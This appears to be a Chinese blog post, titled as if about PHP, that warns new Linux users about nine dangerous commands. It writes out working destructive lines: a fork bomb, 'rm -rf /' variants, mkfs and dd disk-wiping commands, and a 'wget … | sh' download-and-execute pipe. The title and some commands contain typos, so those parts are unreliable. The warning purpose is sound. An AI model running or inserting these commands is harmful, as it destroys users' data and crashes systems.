9個必須時時警惕的php指令&代碼
- 伊谢尔伦原創
- 2016-11-24 14:31:481149瀏覽
Linux shell/terminal命令非常強大,即使一個簡單的命令就可能導致資料夾、檔案或路徑資料夾等被刪除。
在某些情況下,Linux甚至不會詢問你而直接執行命令,導致你丟失各種資料資訊。
一般來說在Web上推薦新的Linux使用者執行這些指令,當然,也有人哪些寫過這程式碼的人不這麼想,因為這玩意你一寫下去就不是玩笑了。
這裡我收集了一些對系統有危害的Linux程式碼,幫助你避免他們。請記住:這些程式碼非常危險,甚至可以經過修改,變得更有危害性。
還有一些事情要注意:有些指令只在Ubuntu中有sudo前綴時是有危害的。其他發行版本的Linux,則是在作為根目錄命令時會有危害。
1. Linux Fork Bomb Command
:(){ :|: & };: 以Fork Bomb聞名,是一個拒絕服務攻擊 的Linux 系統。 :(){ :|: & };: 是一個bash函數。只要被執行,他會不斷重複,直到系統被凍結。
你只能重新啟動系統解決這個問題。所以當你在Linux介面執行這個指令時一定要注意。
2. Mv Folder/Dev/Null Command
mv folder/dev/null 也是一個危險的指令。 Dev/null 或 null device 是一個刪除所有寫在這個裝置文件上資料的裝置文件,但是,該操作提示卻是寫入操作執行成功。這就是我們常說的bit bucked 或 black hole。
3. Rm -Rf Command
rm -rf指令在Linux系統中可以快速刪除資料夾及其內容。如果,你不知道如何正確使用它,你就只是哭了。
列下m-rf 命令最常見的組合和選擇:
rm command :删除Linux系统的文件 rm -f command:不需提示,删除文件中的只读文件 rm -r command 循环删除文件夹的内容 rm -d command :删除空目录,如果非空目录则不会执行该操作 rm -rf/ command:强制删除根目录中的所有内容和子文件夹(包括写保护文件)命令。 rm -rf* command :强制删除当前目录中的所有内容(当前工作目录)和字文件夹 rm -rf. command:强制删除当前文件夹目录/子目录中的所有内容 。同rm -r.[^.]* The rm -r.[^.]* command :删除文件及文件夹,带有删除提示
4. Mkfs Command
如果你不知mkfs的作用,那麼它也是一個危險的命令,mkfs之後寫的任何命令都會被一個空白的linux檔案系統格式化、替代。
下面列舉出需要管理員權限,格式化硬碟的指令:
mkfs mkfs.ext3 mkfs.bfs mkfs.ext2 mkfs.minix mkfs.msdos mkfs.reiserfs mkfs.vfat
mkfs.cramfs也可以和上面的程式碼做同樣的事情,不過不需要管理來源權限。
5. Tar Bomb
tar指令用於將多個檔案以.tar格式放入一個檔案中(存檔檔案)。 Tape Archive (Tar) bomb可以由他創造。
當為壓縮時,就是這個存檔檔案產生數以萬計的相似名稱檔案出現在目前目錄中而不是新目錄。
當收到tar文件,定期創建一個新的保護目錄,然後在解壓縮前將接受的tar文件放到這個目錄中,你可以避免成為tar bomb的受害者。
6. Dd Command
Dd 指令用於複製&改變硬碟分區。如果,你用錯地方了,那麼也很危險。
下面列舉dd命令:
dd if=/dev/hda of=/dev/hdb dd if=/dev/hda of=/dev/sdb dd if=something of=/dev/hda dd if=something of=/dev/sda
下面這個命令會將整個主硬盤清零:dd if=/dev/zero of=/dev/had
7. Shell Script Code
有時候,你可能會被人坑,給你一個shell腳本文件,讓你去下載並執行它。該腳本可能會包含一些惡意的或危險的程式碼。命令形式可能會是這樣:wget http://some_malicious_source -O- | sh。 wget將會在sh狹隘腳本 時下載腳本。
8. Malicious Source Code
也許有人會給你原始碼讓你編譯他。程式碼可能是正常程式碼,不過,有一些惡意程式碼偽裝在大型原始碼中,如果是這樣,你的系統就中槍了。如何避免?僅接受並編譯可信賴來源的原始碼。
9. Decompression Bomb
你已經收到一個壓縮文件,你被要求提取這個看起來很小的文件,可能小到KB。事實上,該小尺寸的壓縮檔案包含高度壓縮資料。
只要檔案解壓縮,上百GB資料會被提取,這時候,過大的資料填滿硬碟導致宕機,幾率就很大了。如何避免?還是那句老話,別手賤,什麼文件都去接收,請接收可信任來源文件。